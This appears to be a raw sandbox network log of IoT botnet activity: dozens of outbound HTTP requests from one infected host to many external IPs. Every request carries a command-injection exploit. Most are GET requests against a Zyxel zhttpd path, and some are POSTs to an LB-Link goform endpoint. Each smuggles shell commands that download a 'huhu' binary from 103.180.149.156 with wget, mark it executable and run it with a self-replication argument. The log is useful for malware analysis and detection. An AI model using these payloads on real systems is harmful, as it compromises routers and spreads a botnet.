                                            Feb 2, 2024 06:21:20.794560909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6420192.168.2.1547680123.79.244.12443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.794589043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6421192.168.2.1560362202.160.109.98443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.794636011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6422192.168.2.153587093.206.29.196443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.794658899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6423192.168.2.154298092.226.36.170443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.798293114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6424192.168.2.155038663.171.252.123443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.798331022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6425192.168.2.1541614205.149.54.135443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.798350096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6426192.168.2.1537590120.228.150.70443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.798407078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6427192.168.2.1544050107.0.167.82443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.798445940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6428192.168.2.1541744212.82.224.6443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.798486948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6429192.168.2.1540376104.19.44.188080
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.052897930 CET237OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                            Cookie: user=admin
                                            Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                            Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.180.149.156/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                            Feb 2, 2024 06:21:21.169925928 CET328INHTTP/1.1 400 Bad Request
                                            Server: cloudflare
                                            Date: Fri, 02 Feb 2024 05:21:21 GMT
                                            Content-Type: text/html
                                            Content-Length: 155
                                            Connection: close
                                            CF-RAY: -
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6430192.168.2.1557982154.16.29.2438080
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.135104895 CET237OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                            Cookie: user=admin
                                            Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                            Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.180.149.156/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6431192.168.2.154554691.192.207.2398080
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.400634050 CET225OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                            Cookie: user=admin
                                            Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                            Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.180.149.156/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6432192.168.2.154477050.50.138.35443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.794637918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6433192.168.2.155044464.7.151.62443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.794758081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6434192.168.2.1542466126.71.167.93443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.794836998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6435192.168.2.1542552165.231.226.204443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.794867992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6436192.168.2.1539004179.176.141.93443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.794907093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6437192.168.2.1533948162.222.227.4443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.794919968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6438192.168.2.154526469.4.229.71443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.794972897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6439192.168.2.154600637.27.49.243443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.794986963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6440192.168.2.154089239.233.179.61443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.795047998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6441192.168.2.1552366125.235.80.33443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.795077085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6442192.168.2.155204085.163.67.219443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.795101881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6443192.168.2.1544200152.246.59.27443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.795156002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6444192.168.2.154318813.27.148.11443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.795208931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6445192.168.2.1556040172.190.158.242443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.795234919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6446192.168.2.1554116210.84.75.138443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.795275927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6447192.168.2.155811477.157.171.8443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.795314074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6448192.168.2.1539204200.44.156.243443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.795336008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6449192.168.2.153358898.38.241.116443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.795386076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6450192.168.2.154730279.243.63.23443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.795423031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6451192.168.2.1553264141.160.237.147443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.795466900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6452192.168.2.1533908221.146.238.48443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.795489073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6453192.168.2.1552656118.35.83.235443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.795542002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6454192.168.2.1559948201.223.109.54443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.795597076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6455192.168.2.154959468.233.154.66443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.795622110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6456192.168.2.1537876204.80.186.35443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.795653105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6457192.168.2.1559042108.6.242.137443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.795666933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6458192.168.2.1547312107.61.102.206443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.795706034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6459192.168.2.1559480158.88.63.192443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.795744896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6460192.168.2.1541698101.234.43.13443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.795799017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6461192.168.2.1545434111.148.32.86443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.795835972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6462192.168.2.15520248.115.83.114443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.795861959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6463192.168.2.1556434199.243.25.207443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.795892000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6464192.168.2.1539580188.218.165.112443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.795941114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6465192.168.2.154748089.103.231.253443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.795962095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6466192.168.2.1541626162.230.238.220443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.796010017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6467192.168.2.1536708194.164.96.87443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.796051025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6468192.168.2.1540496149.139.93.240443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.796081066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6469192.168.2.1538568168.219.103.169443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.796119928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6470192.168.2.1543738145.161.222.176443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.796145916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6471192.168.2.153710877.105.27.123443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.796170950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6472192.168.2.155660012.70.183.5443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.796209097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6473192.168.2.1551170152.91.87.215443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.796238899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6474192.168.2.154208875.46.103.117443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.796291113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6475192.168.2.153633066.119.93.197443
                                            TimestampBytes transferredDirectionData
